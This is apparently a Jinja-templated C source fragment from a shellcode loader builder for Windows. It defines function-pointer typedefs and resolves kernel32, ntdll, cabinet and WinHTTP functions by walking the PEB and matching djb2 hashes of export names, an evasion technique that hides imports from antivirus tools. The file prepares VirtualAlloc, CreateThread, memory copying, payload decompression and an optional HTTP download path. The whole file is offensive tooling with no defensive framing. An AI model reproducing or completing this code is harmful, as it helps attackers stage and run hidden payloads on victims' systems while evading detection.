// --- 1. Define Typedefs for all required function pointers ---
typedef HMODULE (WINAPI *pLoadLibraryA)(LPCSTR);
typedef FARPROC (WINAPI *pGetProcAddress)(HMODULE, LPCSTR);
typedef LPVOID (WINAPI *pVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
typedef HANDLE (WINAPI *pCreateThread)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
typedef VOID (WINAPI *pRtlMoveMemory)(VOID UNALIGNED *, const VOID UNALIGNED *, SIZE_T);
typedef DWORD (WINAPI *pWaitForSingleObject)(HANDLE, DWORD);
typedef BOOL (WINAPI *pCloseHandle)(HANDLE);
typedef HANDLE (WINAPI *pCreateFileMappingW)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCWSTR);
typedef LPVOID (WINAPI *pMapViewOfFile)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
typedef HANDLE (WINAPI *pGetProcessHeap)(VOID);
typedef LPVOID (WINAPI *pHeapAlloc)(HANDLE, DWORD, SIZE_T);
typedef BOOL (WINAPI *pHeapFree)(HANDLE, DWORD, LPVOID);
typedef BOOL (WINAPI *pCreateDecompressor)(DWORD, PVOID, PDECOMPRESSOR_HANDLE);
typedef BOOL (WINAPI *pDecompress)(DECOMPRESSOR_HANDLE, LPCVOID, SIZE_T, PVOID, SIZE_T, PSIZE_T);
typedef BOOL (WINAPI *pCloseDecompressor)(DECOMPRESSOR_HANDLE);
typedef HANDLE (WINAPI *pCreateFileA)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
typedef DWORD (WINAPI *pGetFileSize)(HANDLE, LPDWORD);
typedef BOOL (WINAPI *pReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef VOID (WINAPI* pRtlZeroMemory)(PVOID, SIZE_T);
{% if data_source == 'http' %}
typedef HINTERNET (WINAPI *pWinHttpOpen)(LPCWSTR, DWORD, LPCWSTR, LPCWSTR, DWORD);
typedef HINTERNET (WINAPI *pWinHttpConnect)(HINTERNET, LPCWSTR, INTERNET_PORT, DWORD);
typedef HINTERNET (WINAPI *pWinHttpOpenRequest)(HINTERNET, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, const LPCWSTR *, DWORD);
typedef BOOL (WINAPI *pWinHttpSendRequest)(HINTERNET, LPCWSTR, DWORD, LPVOID, DWORD, DWORD, DWORD_PTR);
typedef BOOL (WINAPI *pWinHttpReceiveResponse)(HINTERNET, LPVOID);
typedef BOOL (WINAPI *pWinHttpQueryDataAvailable)(HINTERNET, LPDWORD);
typedef BOOL (WINAPI *pWinHttpReadData)(HINTERNET, LPVOID, DWORD, LPDWORD);
typedef BOOL (WINAPI *pWinHttpCloseHandle)(HINTERNET);
typedef BOOL (WINAPI *pWinHttpCrackUrl)(LPCWSTR, DWORD, DWORD, LPURL_COMPONENTSW);
typedef BOOL (WINAPI *pWinHttpSetOption)(HINTERNET, DWORD, LPVOID, DWORD);
typedef BOOL (WINAPI *pWinHttpQueryHeaders)(HINTERNET, DWORD, LPCWSTR, LPVOID, LPDWORD, LPDWORD);
{% endif %}

// --- 2. Declare global variables to hold the resolved function pointers ---
pLoadLibraryA pfnLoadLibraryA;
pVirtualAlloc pfnVirtualAlloc;
pCreateThread pfnCreateThread;
pWaitForSingleObject pfnWaitForSingleObject;
pCloseHandle pfnCloseHandle;
pCreateFileMappingW pfnCreateFileMappingW;
pMapViewOfFile pfnMapViewOfFile;
pGetProcessHeap pfnGetProcessHeap;
pHeapAlloc pfnHeapAlloc;
pHeapFree pfnHeapFree;
pCreateDecompressor pfnCreateDecompressor;
pDecompress pfnDecompress;
pCloseDecompressor pfnCloseDecompressor;
pCreateFileA pfnCreateFileA;
pGetFileSize pfnGetFileSize;
pReadFile pfnReadFile;
pRtlMoveMemory pfnRtlMoveMemory;
pRtlZeroMemory pfnRtlZeroMemory;
{% if data_source == 'http' %}
pWinHttpOpen pfnWinHttpOpen;
pWinHttpConnect pfnWinHttpConnect;
pWinHttpOpenRequest pfnWinHttpOpenRequest;
pWinHttpSendRequest pfnWinHttpSendRequest;
pWinHttpReceiveResponse pfnWinHttpReceiveResponse;
pWinHttpQueryDataAvailable pfnWinHttpQueryDataAvailable;
pWinHttpReadData pfnWinHttpReadData;
pWinHttpCloseHandle pfnWinHttpCloseHandle;
pWinHttpCrackUrl pfnWinHttpCrackUrl;
pWinHttpSetOption pfnWinHttpSetOption;
pWinHttpQueryHeaders pfnWinHttpQueryHeaders;
{% endif %}

// --- 3. Hashing and Resolution Functions ---
DWORD HashString(const char* str) {
    DWORD hash = 5381;
    int c;
    while ((c = *str++)) {
        hash = ((hash << 5) + hash) + c; // hash * 33 + c
    }
    return hash;
}

HMODULE GetModuleHandleByHash(DWORD dwModuleNameHash) {
    if (dwModuleNameHash == 0) return NULL;

#ifdef _WIN64
    PPEB pPeb = (PEB*)(__readgsqword(0x60));
#else
    PPEB pPeb = (PEB*)(__readfsdword(0x30));
#endif

    PPEB_LDR_DATA pLdr = pPeb->Ldr;
    PLIST_ENTRY listHead = &(pLdr->InMemoryOrderModuleList);
    PLIST_ENTRY currentEntry = listHead->Flink;

    while (currentEntry != listHead) {
        PLDR_DATA_TABLE_ENTRY pDte = CONTAINING_RECORD(currentEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

        if (pDte->FullDllName.Length > 0) {
            char upperDllName[MAX_PATH];
            DWORD i = 0;
            while (pDte->FullDllName.Buffer[i] && i < MAX_PATH - 1) {
                char c = (char)pDte->FullDllName.Buffer[i];
                if (c >= 'a' && c <= 'z') { upperDllName[i] = c - 32; } 
                else { upperDllName[i] = c; }
                i++;
            }
            upperDllName[i] = '\0';
            
            char* last_slash = strrchr(upperDllName, '\\');
            char* module_name = last_slash ? last_slash + 1 : upperDllName;

            if (HashString(module_name) == dwModuleNameHash) {
                return (HMODULE)pDte->DllBase;
            }
        }
        currentEntry = currentEntry->Flink;
    }
    return NULL;
}

FARPROC GetProcAddressByHash(HMODULE hModule, DWORD dwApiNameHash) {
    if (hModule == NULL || dwApiNameHash == 0) return NULL;
    PBYTE pBase = (PBYTE)hModule;
    PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    
    PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames);
    PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);
    PWORD FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals);

    for (DWORD i = 0; i < pImgExportDir->NumberOfNames; i++) {
        CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]);
        if (dwApiNameHash == HashString(pFunctionName)) {
            return (FARPROC)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]);
        }
    }
    return NULL;
}

void ResolveAPIs() {
    DWORD KERNEL32_HASH = {{ hash_kernel32_dll }};
    DWORD NTDLL_HASH = {{ hash_ntdll_dll }};
    DWORD CABINET_HASH = {{ hash_cabinet_dll }};
    DWORD WINHTTP_HASH = {{ hash_winhttp_dll }};

    HMODULE hKernel32 = GetModuleHandleByHash(KERNEL32_HASH);
    HMODULE hNtdll = GetModuleHandleByHash(NTDLL_HASH);
    
    pfnLoadLibraryA = (pLoadLibraryA)GetProcAddressByHash(hKernel32, {{ hash_loadlibrarya }});
    pfnVirtualAlloc = (pVirtualAlloc)GetProcAddressByHash(hKernel32, {{ hash_virtualalloc }});
    pfnCreateThread = (pCreateThread)GetProcAddressByHash(hKernel32, {{ hash_createthread }});
    pfnWaitForSingleObject = (pWaitForSingleObject)GetProcAddressByHash(hKernel32, {{ hash_waitforsingleobject }});
    pfnCloseHandle = (pCloseHandle)GetProcAddressByHash(hKernel32, {{ hash_closehandle }});
    pfnCreateFileMappingW = (pCreateFileMappingW)GetProcAddressByHash(hKernel32, {{ hash_createfilemappingw }});
    pfnMapViewOfFile = (pMapViewOfFile)GetProcAddressByHash(hKernel32, {{ hash_mapviewoffile }});
    pfnGetProcessHeap = (pGetProcessHeap)GetProcAddressByHash(hKernel32, {{ hash_getprocessheap }});
    pfnHeapAlloc = (pHeapAlloc)GetProcAddressByHash(hNtdll, {{ hash_rtlallocateheap }});
    pfnHeapFree = (pHeapFree)GetProcAddressByHash(hKernel32, {{ hash_heapfree }});
    pfnCreateFileA = (pCreateFileA)GetProcAddressByHash(hKernel32, {{ hash_createfilea }});
    pfnGetFileSize = (pGetFileSize)GetProcAddressByHash(hKernel32, {{ hash_getfilesize }});
    pfnReadFile = (pReadFile)GetProcAddressByHash(hKernel32, {{ hash_readfile }});

    if (hNtdll != NULL) {
        pfnRtlMoveMemory = (pRtlMoveMemory)GetProcAddressByHash(hNtdll, {{ hash_rtlmovememory }});
        pfnRtlZeroMemory = (pRtlZeroMemory)GetProcAddressByHash(hNtdll, {{ hash_rtlzeromemory }});
    }

    {% if bytecode_compression == 'mszip_compressor' %}
    HMODULE hCabinet = GetModuleHandleByHash(CABINET_HASH);
    if (hCabinet == NULL && pfnLoadLibraryA != NULL) { 
        hCabinet = pfnLoadLibraryA("cabinet.dll"); 
    }
    if (hCabinet != NULL) {
        pfnCreateDecompressor = (pCreateDecompressor)GetProcAddressByHash(hCabinet, {{ hash_createdecompressor }});
        pfnDecompress = (pDecompress)GetProcAddressByHash(hCabinet, {{ hash_decompress }});
        pfnCloseDecompressor = (pCloseDecompressor)GetProcAddressByHash(hCabinet, {{ hash_closedecompressor }});
    }
    {% endif %}

    {% if data_source == 'http' %}
    HMODULE hWinHttp = GetModuleHandleByHash(WINHTTP_HASH);
    if (hWinHttp == NULL && pfnLoadLibraryA != NULL) { hWinHttp = pfnLoadLibraryA("winhttp.dll"); }
    if (hWinHttp != NULL) {
        pfnWinHttpOpen = (pWinHttpOpen)GetProcAddressByHash(hWinHttp, {{ hash_winhttpopen }});
        pfnWinHttpConnect = (pWinHttpConnect)GetProcAddressByHash(hWinHttp, {{ hash_winhttpconnect }});
        pfnWinHttpOpenRequest = (pWinHttpOpenRequest)GetProcAddressByHash(hWinHttp, {{ hash_winhttpopenrequest }});
        pfnWinHttpSendRequest = (pWinHttpSendRequest)GetProcAddressByHash(hWinHttp, {{ hash_winhttpsendrequest }});
        pfnWinHttpReceiveResponse = (pWinHttpReceiveResponse)GetProcAddressByHash(hWinHttp, {{ hash_winhttpreceiveresponse }});
        pfnWinHttpQueryDataAvailable = (pWinHttpQueryDataAvailable)GetProcAddressByHash(hWinHttp, {{ hash_winhttpquerydataavailable }});
        pfnWinHttpReadData = (pWinHttpReadData)GetProcAddressByHash(hWinHttp, {{ hash_winhttpreaddata }});
        pfnWinHttpCloseHandle = (pWinHttpCloseHandle)GetProcAddressByHash(hWinHttp, {{ hash_winhttpclosehandle }});
        pfnWinHttpCrackUrl = (pWinHttpCrackUrl)GetProcAddressByHash(hWinHttp, {{ hash_winhttpcrackurl }});
        pfnWinHttpSetOption = (pWinHttpSetOption)GetProcAddressByHash(hWinHttp, {{ hash_winhttpsetoption }});
        pfnWinHttpQueryHeaders = (pWinHttpQueryHeaders)GetProcAddressByHash(hWinHttp, {{ hash_winhttpqueryheaders }});
    }
    {% endif %}

    DEBUG_PRINT("API functions resolved by hash.");
}
